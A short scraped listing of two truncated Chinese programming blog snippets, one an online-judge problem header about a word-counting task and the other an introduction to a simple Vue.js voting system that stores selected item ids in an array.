考研路茫茫--单词情结 Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Others) Problem ...
- vue,一路走来(15)--简单投票系统
今天记录一下简单的投票系统,主要实现选中至少五张作品,并提交投票. 思路:选中作品,将作品id存入到数组里. 取消投票,则从数组中移除该作品id. 如图效果: <li v-for="( ...